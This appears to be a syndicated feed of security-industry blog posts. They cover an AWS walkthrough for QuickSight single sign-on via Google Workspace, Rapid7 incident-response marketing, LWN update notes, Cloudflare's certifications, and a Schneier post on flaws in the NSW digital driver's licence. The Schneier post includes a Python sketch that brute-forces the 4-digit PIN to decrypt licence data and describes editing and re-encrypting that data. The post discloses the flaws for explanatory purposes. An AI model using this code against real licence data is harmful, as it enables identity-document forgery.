Amazon QuickSight is a scalable, serverless, embeddable, machine learning (ML)-powered business intelligence (BI) service built for the cloud that supports identity federation in both Standard and Enterprise editions. Organizations are working towards centralizing their identity and access strategy across all of their applications, including on-premises, third-party, and applications on AWS. Many organizations use Google Workspace to control and manage user authentication and authorization centrally. You can enable federation to QuickSight accounts without needing to create and manage users. This authorizes users to access QuickSight assets—analyses, dashboards, folders, and datasets—through centrally managed Google Workspace Identities.

In this post, we go through the steps to configure federated single sign-on (SSO) between a Google Workspace instance and QuickSight account. We demonstrate registering an SSO application in Google Workspace, and map QuickSight roles (admin, author, and reader) to Google Workspace Identities. These QuickSight roles represent three different personas supported in QuickSight. Administrators can publish the QuickSight app in a Google Workspace Dashboard to enable users to SSO to QuickSight using their Google Workspace credentials.

Solution overview

In your organization, the portal is typically a function of your identity provider (IdP), which handles the exchange of trust between your organization and QuickSight.

On the Google Workspace Dashboard, you can review a list of apps. This post shows you how to configure the custom app for AWS.

The user flow consists of the following steps:

  1. The user logs in to your organization’s portal and chooses the option to go to the QuickSight console.
  2. The portal verifies the user’s identity in your organization.
  3. The portal generates a SAML authentication response that includes assertions that identify the user and include attributes about the user. The portal sends this response to the client browser. Although not discussed here, you can also configure your IdP to include a SAML assertion attribute called SessionDuration that specifies how long the console session is valid.
  4. The client browser is redirected to the AWS single sign-on endpoint and posts the SAML assertion.
  5. The endpoint requests temporary security credentials on behalf of the user, and creates a QuickSight sign-in URL that uses those credentials.
  6. AWS sends the sign-in URL back to the client as a redirect.
  7. The client browser is redirected to the QuickSight console. If the SAML authentication response includes attributes that map to multiple AWS Identity and Access Management (IAM) roles, the user is first prompted to select the role for accessing the console.

The following diagram illustrates the solution architecture.

The following are the high-level steps to set up federated single sign-on access via Google Workspace:

  1. Download the Google IdP information.
  2. Create an IAM IdP with Google as SAML IdP.
  3. Configure IAM policies for QuickSight roles.
  4. Configure IAM QuickSight roles for federated users.
  5. Create a custom user attribute in Google Workspace.
  6. Add the AWS SAML attributes to your Google Workspace user profile.
  7. Set up the AWS SAML app in Google Workspace.
  8. Grant access to users in Google Workspace.
  9. Verify federated access to your QuickSight instance.

Detailed procedures for each of these steps comprise the remainder of this post.

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • A Google Workspace subscription
  • An AWS account with QuickSight subscription
  • Basic understanding of QuickSight roles—admin, author, and reader
  • Basic understanding of IAM and privileges required to create an IAM identity provider, roles, policies, and users

Download the Google IdP information

First, let’s get the SAML metadata that contains essential information to enable your AWS account to authenticate the IdP and locate the necessary communication endpoint locations. Complete the following steps:

  1. Log in to the Google Workspace Admin console.
  2. On the Admin console home page, under Security in the navigation pane, choose Authentication and SSO with SAML applications.
  3. Under IdP metadata, choose Download Metadata.

Create an IAM IdP with Google as SAML IdP

You now configure Google as your SAML IdP via the IAM console. Complete the following steps:

  1. On the IAM console, choose Identity providers in the navigation pane.
  2. Choose Add provider.
  3. For Configure provider, select SAML.
  4. For Provider name, enter a name for the IdP (such as Google).
  5. For Metadata document, choose Choose file and specify the SAML metadata document that you downloaded.
  6. Choose Add provider.
  7. Document the Amazon Resource Name (ARN) by viewing the IdP you just created.

The ARN should look similar to arn:aws:iam::<YOURACCOUNTNUMBER>:saml-provider/Google. We need this ARN to configure claim rules later in this post.

Configure IAM policies for QuickSight roles

In this step, we create three IAM policies for different role permissions in QuickSight:

  • QuickSight-Federated-Admin
  • QuickSight-Federated-Author
  • QuickSight-Federated-Reader

Use the following steps to set up the QuickSight-Federated-Admin policy. This policy grants admin privileges in QuickSight to the federated user:

  1. On the IAM console, choose Policies.
  2. Choose Create policy.
  3. Choose JSON and replace the existing text with the following code:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "quicksight:CreateAdmin",
                "Resource": "*"
            }
        ]
    }

  4. Choose Review policy.
  5. For Name, enter QuickSight-Federated-Admin.
  6. Choose Create policy.
  7. Repeat these steps to create QuickSight-Federated-Author, and use the following policy to grant author privileges in QuickSight to the federated user:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "quicksight:CreateUser",
                "Resource": "*"
            }
        ]
    }

  8. Repeat the steps to create QuickSight-Federated-Reader, and use the following policy to grant reader privileges in QuickSight to the federated user:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "quicksight:CreateReader",
                "Resource": "*"
            }
        ]
    }

Configure IAM QuickSight roles for federated users

Next, create the roles that Google IdP users assume when federating into QuickSight. The following steps set up the admin role:

  1. On the IAM console, choose Roles in the navigation pane.
  2. Choose Create role.
  3. For Trusted entity type, choose SAML 2.0 federation.
  4. For SAML provider, choose the provider you created earlier (Google).
  5. For Attribute, choose SAML:aud.
  6. For Value, enter https://signin.aws.amazon.com/saml.
  7. Choose Next.
  8. On the Add permissions page, select the QuickSight-Federated-Admin IAM policy you created earlier.
  9. Choose Next.
  10. For Role name, enter QuickSight-Admin-Role.
  11. For Role description, enter a description.
  12. Choose Create role.
  13. On the IAM console, in the navigation pane, choose Roles.
  14. Choose the QuickSight-Admin-Role role you created to open the role’s properties.
  15. On the Trust relationships tab, choose Edit trust relationship.
  16. Under Trusted entities, verify that the IdP you created is listed.
  17. Under Condition, verify that SAML:aud with a value of https://signin.aws.amazon.com/saml is present.
  18. Repeat these steps to create author and reader roles and attach the appropriate policies:
    1. For QuickSight-Author-Role, use the policy QuickSight-Federated-Author.
    2. For QuickSight-Reader-Role, use the policy QuickSight-Federated-Reader.
  19. Navigate to the newly created roles and note the ARNs for them.

We use these ARNs to configure claims rules later in this post. They are in the following format:

  • arn:aws:iam::<YOURACCOUNTNUMBER>:role/QuickSight-Admin-Role
  • arn:aws:iam::<YOURACCOUNTNUMBER>:role/QuickSight-Author-Role
  • arn:aws:iam::<YOURACCOUNTNUMBER>:role/QuickSight-Reader-Role

Create a custom user attribute in Google Workspace

Now let’s create a custom user attribute in your Google Workspace. This allows us to add the SAML attributes that the AWS Management Console expects in order to allow a SAML-based authentication.

  1. Log in to Google Admin console with admin credentials.
  2. Under Directory, choose Users.
  3. On the More options menu, choose Manage custom attributes.
  4. Choose Add Custom Attribute.
  5. Configure the custom attribute as follows:
    1. Category: Amazon
    2. Description: Amazon Custom Attributes
  6. For Custom fields, enter the following:
    1. Name: Role
    2. Info type: Text
    3. Visibility: Visible to user and admin
    4. No. of values: Multi-value
  7. Choose Add.

The new category appears on the Manage user attributes page.

Add the AWS SAML attributes to the Google Workspace user profile

Now that we have configured a custom user attribute, let’s add the SAML attributes that we noted earlier to the Google Workspace user profile.

  1. While logged in to the Google Admin console with admin credentials, navigate to the Users page.
  2. In the Users list, find the user. If you need help, see Find a user account.
  3. Choose the user’s name to open their account page.
  4. Choose User information.
  5. Choose the custom attribute you recently created, named Amazon.
  6. Add a value to this custom attribute, using the ARNs you noted earlier, in the following format: <AWS Role ARN>,<AWS provider/IdP ARN>.
  7. Choose Save.

Set up the AWS SAML app in Google Workspace

Now that we have everything in place, we’re ready to create a SAML app within our Google Workspace account and provide the QuickSight instance starting URL. This provides the entry point for Google Workspace users to SSO into the QuickSight instance.

  1. While logged in to Google Admin console with admin credentials, under Apps, choose Web and mobile apps.
  2. Choose Add App, and Search for apps.
  3. Enter Amazon Web Services in the search field.
  4. In the search results, hover over the Amazon Web Services SAML app and choose Select.
  5. On the Google Identity Provider details page, choose Continue.
  6. On the Service provider details page, the ACS URL and Entity ID values for Amazon Web Services are configured by default.
  7. For Start URL, enter https://quicksight.aws.amazon.com.
  8. On the Attribute Mapping page, choose the Select field menu and map the following Google directory attributes to their corresponding Amazon Web Services attributes:

    Google Directory Attribute        | Amazon Web Services Attribute
    Basic Information > Primary Email | https://aws.amazon.com/SAML/Attributes/RoleSessionName
    Amazon > Role                     | https://aws.amazon.com/SAML/Attributes/Role

  9. Choose Finish.

Grant access to users in Google Workspace

When the SAML app is created in Google Workspace, it’s turned off by default, which means the app isn’t visible to users logged in to their Google Workspace account. We now enable the AWS SAML app for your Google Workspace users.

  1. While logged in to the Google Admin console with admin credentials, navigate to the Web and mobile apps page.
  2. Choose Amazon Web Services.

  3. Choose User access.
  4. To turn on a service for everyone in your organization, choose ON for everyone.
  5. Choose Save.

If you don’t want to activate this application for all users, you can alternatively grant access to a subset of users by using Google Workspace organizational units.

Verify federated access to the QuickSight instance

To test your SAML 2.0-based authentication with QuickSight for users in your existing IdP (Google Workspace), complete the following steps:

  1. Open a new browser session, for example, using Chrome, in a new incognito window.
  2. Log in to your Google Workspace account (for the purpose of this demo, we use the Google Workspace admin account).
  3. Choose Amazon Web Services from the list of Google apps.

Conclusion

This post provided a step-by-step guide for configuring Google Workspace as your IdP, and using IAM roles to enable SSO to QuickSight. Now your users have a seamless sign-in experience to QuickSight and have the appropriate level of access related to their role.

Although this post demonstrated the integration of IAM and Google Workspace, you can replicate this solution using your choice of SAML 2.0 IdPs. For other supported federation options, see Using identity federation and single sign-on (SSO) with Amazon QuickSight.

To get answers to your questions related to QuickSight, refer to the QuickSight Community.

If you have any questions or feedback, please leave a comment.


About the Authors

Sriharsh Adari is a Senior Solutions Architect at Amazon Web Services (AWS), where he helps customers work backwards from business outcomes to develop innovative solutions on AWS. Over the years, he has helped multiple customers on data platform transformations across industry verticals. His core areas of expertise include Technology Strategy, Data Analytics, and Data Science. In his spare time, he enjoys playing sports, binge-watching TV shows, and playing Tabla.

Srikanth Baheti is a Specialized World Wide Sr. Solution Architect for Amazon QuickSight. He started his career as a consultant and worked for multiple private and government organizations. Later he worked for PerkinElmer Health and Sciences & eResearch Technology Inc, where he was responsible for designing and developing high-traffic web applications and highly scalable, maintainable data pipelines for reporting platforms using AWS services and serverless computing.

DFIR Without Limits: Moving Beyond the “Sucker’s Choice” of Today’s Breach Response Services

Post Syndicated from Warwick Webb original https://blog.rapid7.com/2022/05/23/dfir-without-limits/

Three-quarters of CEOs and their boards believe a major breach is “inevitable.” And those closest to the action? Like CISOs? They’re nearly unanimous.

Gartner is right there, too. Their 2021 Market Guide for Digital Forensics and Incident Response (DFIR) Services recommends you “operate under the assumption that security breaches will occur, the only variable factors being the timing, the severity, and the response requirements.”

When that breach happens, you’ll most likely need help. For Rapid7 MDR customers, we’re there for you when you need us, period. Our belief is that, if a breach is inevitable, then a logical, transparent, collaborative, and effective approach to response should be, too.

I’m not just talking about the table-stakes “response” to everyday security threats. I’m talking about digital forensics and world-class incident response for any incident – no matter if it’s a minor breach like a phishing email with an attached maldoc or a major targeted breach involving multiple endpoints compromised by an advanced attacker.

Protecting your environment is our shared responsibility. As long as you are willing and able to partner with us during and after the Incident Response process, we are here for you. Rapid7 does the DFIR heavy lift. You cooperate to eradicate the threat and work to improve your security posture as a result.

Unfortunately, that’s not how all of the market sees it.

How vendors typically provide DFIR

Some managed detection and response (MDR) vendors or managed security services providers (MSSPs) do understand that there’s an R in MDR. Typically, they’ll do a cursory investigation, validation and – if you’re lucky – some form of basic or automated response.

For most, that’s where the R stops. If they can’t handle an emergency breach response situation (or if you’re on your own without any DFIR on staff), you’ll wind up hiring a third-party incident response (IR) consulting service. This will be a service you’ve found, or one that’s required by your cyber insurance provider. Perhaps you planned ahead and pre-purchased an hourly IR retainer.

Either way, how you pay for IR determines your customer experience during “response.” It’s a model designed to maximize provider profits, not your outcomes.

At a glance

                 | IR Consulting Services | IR Included in Managed Services
Scope            | Unbounded | Limited to managed services in-scope environments
Time Limit       | Capped by number of hours or number of incidents | Capped by number of hours or number of incidents
Expertise        | Senior IR Consultants | Capped by number of hours or number of incidents
24×7 IR          | No | Yes
Tooling          | Often will deploy a separate tooling stack, without easy access to historical data | Existing tooling, utilizing historical data but potentially lacking in forensic capability
Time to Respond  | Slower (limited by legal documents, SLAs, lack of familiarity in the customer environment, time for tool deployment) | Faster (24×7, uses existing tools, multiple analysts)
Pricing Model    | Proactively purchased as a retainer or reactively on an hourly basis | Included in purchase, up to an arbitrarily defined limit

There’s a good reason DFIR experts are reserved for expensive consulting services engagements. They’re a rare breed.

Most MDR teams can’t afford to staff the same DFIR experts that answer the Breach Response hotline. Security vendors price, package, and deliver these services in a way to reserve their more experienced (and expensive) experts for IR consulting.

Either you purchase Managed Services and expensive IR consulting hours (and play intermediary between these two separate teams), or you settle for “Incident Response lite” from your Managed Services SOC team.

If this seems like a “lesser of two evils” approach with two unappealing options, it is.

The future of incident response has arrived

Over a year ago, Rapid7 merged our Incident Response Consulting Team with our MDR SOC to ensure all MDR customers receive the same high-caliber DFIR expertise as a core capability of our service – no Breach Response hotlines or retainer hours needed.

This single, integrated team of Detection and Response experts started working together to execute on our response mission: early detection and rapid, highly effective investigation, containment, and eradication of threats.

Our SOC analysts are experts on alert triage, tuning, and threat hunting. They have the most up-to-date knowledge of attackers’ current tactics, techniques, and procedures and are extremely well-versed in attacker behavior, isolating malicious activity and stopping it in its tracks. When a minor incident is detected, our SOC analysts begin incident investigation – root cause analysis, malware reverse engineering, malicious code deobfuscation, and more – and response immediately. If the scope becomes large and complex, we (literally) swivel our chair to tap our IR reinforcements on the shoulder.

Senior IR consultants are seasoned DFIR practitioners. They’re also the experts leading the response to major breaches, directing investigation, containment, and eradication activities while clearly communicating with stakeholders on the status, scope, and impact of the incident.

Both teams benefit. The managed services SOC team has access to a world class Incident Response team. And the expert incident response consultants have a global team of (also world class) security analysts trained to assist with forensic investigation and response around the clock (including monitoring the compromised environment for new attacker activity).

Most importantly, our MDR customers benefit. This reimagining of how we work together delivers seamless, effective incident response for all. When every second counts, an organization cannot afford the limited response of most MDR providers, or the delay and confusion that comes with engaging a separate IR vendor.

Grab a coffee, it’s major breach story time

Here’s a real-life example of how our integrated approach works.

In early January, a new MDR client was finishing the onboarding process by installing the Insight Agent on their devices. Almost immediately upon agent installation, the MDR team noticed critical alerts flowing into InsightIDR (our unified SIEM and XDR solution).

Our SOC analysts dug in and realized this wasn’t a typical attack. The detections indicated a potential major incident, consistent with attacker behavior for ransomware. SOC analysts immediately used Active Response to quarantine the affected assets and initiated our incident response process.

The investigation transitioned to the IR team within minutes, and a senior IR consultant (from the same team responsible for leading breach response for Rapid7’s off-the-street or retainer customers) took ownership of the incident response engagement.

After assessing the early information provided by the SOC, the IR consultant identified the highest-priority investigation and response actions, taking on some of these tasks directly and assigning other tasks to additional IR consultants and SOC analysts. The objective: teamwork and speed.

The SOC worked around the clock together with the IR team to search these systems and identify traces of malicious activity. The team used already-deployed tools, such as InsightIDR and Velociraptor (Rapid7’s open-source DFIR tool).

This major incident was remediated and closed within three days of the initial alert, stopping the installation of ransomware within the customer’s environment and cutting out days and even weeks of back-and-forth between the customer, the MDR SOC team, and a third-party Breach Response team.

Now, no limits and a customer experience you’ll love

The results speak for themselves. Not only does the embedded IR model enable each team to reach beyond its traditional boundaries, it brings faster and smoother outcomes to our customers.

And now we’re taking this a step further.

Previously, our MDR services included up to two “uncapped” (no limit on IR team time and resources) Remote Incident Response engagements per year. While this was more than enough for most customers (and highly unusual for an MDR provider), we realized that imposing any arbitrary limits on DFIR put unnecessary constraints on delivering on our core mission.

For this reason, we have removed the Remote Incident Response limits from our MDR service across all tiers. Rapid7 will now respond to ALL incidents within our MDR customers’ in-scope environments, regardless of incident scope and complexity, and bring all the necessary resources to bear to effectively investigate, contain and eradicate these threats.

Making these DFIR engagements – often reserved for breach response retainer customers – part of the core MDR service (not just providing basic response or including hours for a retainer) just raised the “best practices” bar for the industry.

It’s not quite unlimited, but it’s close. The way we see it, we’ll assist with the hard parts of DFIR, while you partner with us to eradicate the threat and implement corrective actions. That partnership is key: Implementing required remediation, mitigation, and corrective actions will help to reduce the likelihood of incident recurrence and improve your overall security posture.

After all, that’s what MDR is all about.

P.S.: If you’re a security analyst or incident responder, we’re hiring!

In addition to providing world-class breach response services to our MDR customers, this new approach makes Rapid7 a great place to work and develop new skills.

Our SOC analysts develop their breach response expertise by working shoulder-to-shoulder with our Incident Response team. And our IR team focuses on doing what they love – not filling out time cards and stressing over their “utilization” as consultants, but leading the response to complex, high-impact breaches and being there for our customers when they need us the most. Plus, with the support and backing of a global SOC, our IR team can actually sleep at night!

Despite the worldwide cybersecurity skills crisis and The Great Resignation sweeping the industry, Rapid7’s MDR team grew by 30% last year with only 5% voluntary analyst turnover – in line with our last three years.

Part of this exceptionally low turnover is due to:

  • Investment in continuing education, diversity, and employee retention benefits
  • A robust training program, clear career progression, the opportunity to level up skills by teaming with IR mentors, and flexibility for extra-curricular “passion project” work (to automate processes and improve aspects of MDR services)
  • Competitive pay, and a focus on making sure analysts are doing work they enjoy day in and day out with a healthy work-life balance (there’s no such thing as a “night shift” since we use a follow-the-sun SOC model)

If you’re a Security Analyst or Incident Responder looking for a new challenge, come join our herd. I think Jeremiah Dewey, VP of Rapid7’s Managed Services, said it best:

“Work doesn’t have to be a soul-sucking, boring march to each Friday. You can follow your passion, have fun in what you’re doing, and be successful in growing your career and growing as a human being.”


Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/896032/

Security updates have been issued by Debian (admesh, condor, firefox-esr, libpgjava, libxml2, rsyslog, and thunderbird), Fedora (dotnet6.0, libarchive, php-openpsa-universalfeedcreator, thunderbird, and vim), Mageia (ffmpeg, kernel, kernel-linus, microcode, netatalk, nvidia-current, nvidia390, opencontainers-runc, postgresql, and ruby-nokogiri), Slackware (mariadb and mozilla), and SUSE (curl, firefox, libarchive, librecad, libxls, openldap2, php7, and postgresql10).

Forging Australian Driver’s Licenses

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/forging-australian-drivers.html

The New South Wales digital driver’s license has multiple implementation flaws that allow for easy forgeries.

The licence file is encrypted using AES-256-CBC encryption and then Base64-encoded.

A 4-digit application PIN (which gets set during the initial onboarding when a user first installs the application) is used as the encryption password to protect the licence data.

The problem here is that an attacker who has access to the encrypted licence data (whether that be through accessing a phone backup, direct access to the device or remote compromise) could easily brute-force this 4-digit PIN by using a script that would try all 10,000 combinations….

[…]

The second design flaw that is favourable for attackers is that the Digital Driver Licence data is never validated against the back-end authority, which is the Service NSW API/database.

This means that the application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot perform further actions such as warn users when this data has been modified.

As the Digital Licence is stored on the client’s device, validation should take place to ensure the local copy of the data actually matches the Digital Driver’s Licence data that was originally downloaded from the Service NSW API.

As this verification does not take place, an attacker is able to display the edited data on the Service NSW application without any preventative factors.

There’s a lot more in the blog post.
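To make the first flaw concrete, here is a minimal, hypothetical Python sketch of the brute force the researcher describes: with only 10,000 possible PINs, trying every candidate takes seconds. The key-derivation details below (PBKDF2-HMAC-SHA256, a salt and IV stored alongside the ciphertext, and a JSON licence payload) are assumptions made for illustration, not the app’s confirmed scheme.

# Hypothetical sketch only: the real app's key derivation, salt, and IV
# handling are not documented here, so PBKDF2-HMAC-SHA256 and a JSON
# payload are assumptions made for illustration.
import base64
import json

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC


def try_pin(pin: str, salt: bytes, iv: bytes, ciphertext: bytes):
    """Derive an AES-256 key from the PIN and attempt a CBC decryption."""
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=10_000)
    key = kdf.derive(pin.encode())
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    try:
        plaintext = padded[: -padded[-1]]  # strip PKCS#7 padding
        json.loads(plaintext)              # a wrong PIN won't decrypt to valid licence JSON
        return plaintext
    except (ValueError, IndexError):
        return None


def brute_force_pin(encoded_blob: str, salt: bytes, iv: bytes):
    """Try all 10,000 candidate PINs against the Base64-encoded licence blob."""
    ciphertext = base64.b64decode(encoded_blob)
    for candidate in range(10_000):
        pin = f"{candidate:04d}"
        plaintext = try_pin(pin, salt, iv, ciphertext)
        if plaintext is not None:
            return pin, plaintext
    return None

Recovering the PIN this way also compounds the second flaw: because the licence data is never re-validated against the Service NSW back end, an attacker could edit the decrypted JSON, re-encrypt it with the same PIN, and the application would display the modified licence without complaint.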

Cloudflare achieves key cloud computing certifications — and there’s more to come

Post Syndicated from Rory Malone original https://blog.cloudflare.com/iso-27018-second-privacy-certification-and-c5/

Back in the early days of the Internet, you could physically see the hardware where your data was stored. You knew where your data was and what kind of locks and security protections you had in place. Fast-forward a few decades, and data is all “in the cloud”. Now, you have to trust that your cloud services provider is putting security precautions in place just as you would have if your data was still sitting on your hardware. The good news is, you don’t have to merely trust your provider anymore. There are a number of ways a cloud services provider can prove it has robust privacy and security protections in place.

Today, we are excited to announce that Cloudflare has taken three major steps forward in proving the security and privacy protections we provide to customers of our cloud services: we achieved a key cloud services certification, ISO/IEC 27018:2019; we completed our independent audit and received our Cloud Computing Compliance Criteria Catalog (“C5”) attestation; and we have joined the EU Cloud Code of Conduct General Assembly to help increase the impact of the trusted cloud ecosystem and encourage more organizations to adopt GDPR-compliant cloud services.

Cloudflare has been committed to data privacy and security since our founding, and it is important to us that we can demonstrate these commitments. Certification provides assurance to our customers that a third party has independently verified that Cloudflare meets the requirements set out in the standard.

ISO/IEC 27018:2019 – Cloud Services Certification

2022 has been a big year for people who like the number ‘two’. February marked the second when the 22nd Feb 2022 20:22:02 passed: the second second of the twenty-second minute of the twentieth hour of the twenty-second day of the second month, of the year twenty-twenty-two! As well as the date being a palindrome — something that reads the same forwards and backwards — on a vintage ‘80s LCD clock, the date and time could be written as an ambigram too — something that can be read upside down as well as the right way up.

When we hit 2022 02 22, our team was busy completing our second annual audit to certify to ISO/IEC 27701:2019, having been one of the first organizations in our industry to have achieved this new ISO privacy certification in 2021, and the first Internet performance & security company to be certified to it. And Cloudflare has now been certified to a second international privacy standard related to the processing of personal data — ISO/IEC 27018:2019.1

ISO 27018 is a privacy extension to the widespread industry standards ISO/IEC 27001 and ISO/IEC 27002, which describe how to establish and run an Information Security Management System. ISO 27018 extends the standards into a code of practice for how any personal information should be protected when processed in a public cloud, such as Cloudflare’s.

What does ISO 27018 mean for Cloudflare customers?

Put simply, with Cloudflare’s certifications to both ISO 27701 and ISO 27018, customers can be assured that Cloudflare both has a privacy program that meets GDPR-aligned industry standards and also that Cloudflare protects the personal data processed in our network as part of that privacy program.

These certifications, in addition to the Data Processing Addendum (“DPA”) we make available to our customers, offer our customers multiple layers of assurance that any personal data that Cloudflare processes on their behalf will be handled in a way that meets the GDPR’s requirements.

The ISO 27018 standard contains enhancements to existing ISO 27002 controls and an additional set of 25 controls identified for organizations that are personal data processors. Controls are essentially a set of best practices that processors must meet regarding data handling and transparency about those practices, protecting and encrypting the personal data processed, and handling data subject rights, among others. As an example, one of the ISO 27018 requirements is:

Where the organization is contracted to process personal data, that personal data may not be used for the purpose of marketing and advertising without establishing that prior consent was obtained from the appropriate data subject. Such consent shall not be a condition for receiving the service.

When Cloudflare acts as a data processor for our customers’ data, that data (and any personal data it may contain) belongs to our customers, not to us. Cloudflare does not track our customers’ end users for marketing or advertising purposes, and we never will. We even went beyond what the ISO control required and added this commitment to our customer DPA:

“… Cloudflare shall not use the Personal Data for the purposes of marketing or advertising…”
– 3.1(b), Cloudflare Data Protection Addendum

Cloudflare achieves ISO 27018:2019 Certification

For ISO 27018, Cloudflare was assessed by a third-party auditor, Schellman, between December 2021 and February 2022. Certifying to an ISO privacy standard is a multi-step process that includes an internal and an external audit, before the organization is finally certified against the standard by the independent auditor. Cloudflare’s new single joint certificate, covering ISO 27001:2013, ISO 27018:2019, and ISO 27701:2019, is now available to download from the Cloudflare Dashboard.

C5:2020 – Cloud Computing Compliance Criteria Catalog

ISO 27018 isn’t all we’re announcing: as we blogged in February, Cloudflare has also been undergoing a separate independent audit for the Cloud Computing Compliance Criteria Catalog certification — also known as C5 — which was introduced by the German government’s Federal Office for Information Security (“BSI”) in 2016 and updated in 2020. C5 evaluates an organization’s security program against a standard of robust cloud security controls. Both German government agencies and private companies place a high level of importance on aligning their cloud computing requirements with these standards. Learn more about C5 here.

Today, we’re excited to announce that we have completed our independent audit and received our C5 attestation from our third-party auditors. The C5 attestation report is now available to download from the Cloudflare Dashboard.

And we’re not done yet…

When the European Union’s benchmark-setting General Data Protection Regulation (“GDPR”) was adopted four years ago this week, Article 40 encouraged:

“…the drawing up of codes of conduct intended to contribute to the proper application of this Regulation, taking account of the specific features of the various processing sectors and the specific needs of micro, small and medium-sized enterprises.”

The first code officially approved by the EU as GDPR-compliant, one year ago this past weekend, is ‘The EU Cloud Code of Conduct’. This code is designed to help cloud service providers demonstrate the protections they provide for the personal data they process on behalf of their customers. It covers all cloud service layers, and compliance with it is overseen by the accredited monitoring body SCOPE Europe. Initially, cloud service providers join as members of the code’s General Assembly; the second step is to undergo an audit to validate their adherence to the code.

Today, we are pleased to announce that Cloudflare has joined the General Assembly of the EU Cloud Code of Conduct. We look forward to the second stage in this process: undertaking our audit and publicly affirming our compliance with the GDPR as a processor of personal data.

Cloudflare Certifications

Customers may now download a copy of Cloudflare’s certifications and reports from the Cloudflare Dashboard; new customers may request these from their sales representative. For the latest information about our certifications and reports, please visit our Trust Hub.


1The International Organization for Standardization (“ISO”) is an international, nongovernmental organization made up of national standards bodies that develops and publishes a wide range of proprietary, industrial, and commercial standards.

The 5.18 kernel has been released

Post Syndicated from original https://lwn.net/Articles/895969/

Linus has released the 5.18 kernel: “No unexpected nasty surprises this last week, so here we go with the 5.18 release right on schedule.” Some of the headline changes in this release include the DAMOS memory-management interface, a number of random-number-generator improvements, the Intel software-defined silicon driver, strict memcpy() bounds checking, a switch to the C11 standard, and more. Also, the Reiserfs filesystem has been deprecated and the last vestiges of a.out support have been removed. See the LWN merge-window summaries (part 1, part 2) and the KernelNewbies 5.18 page for more details.
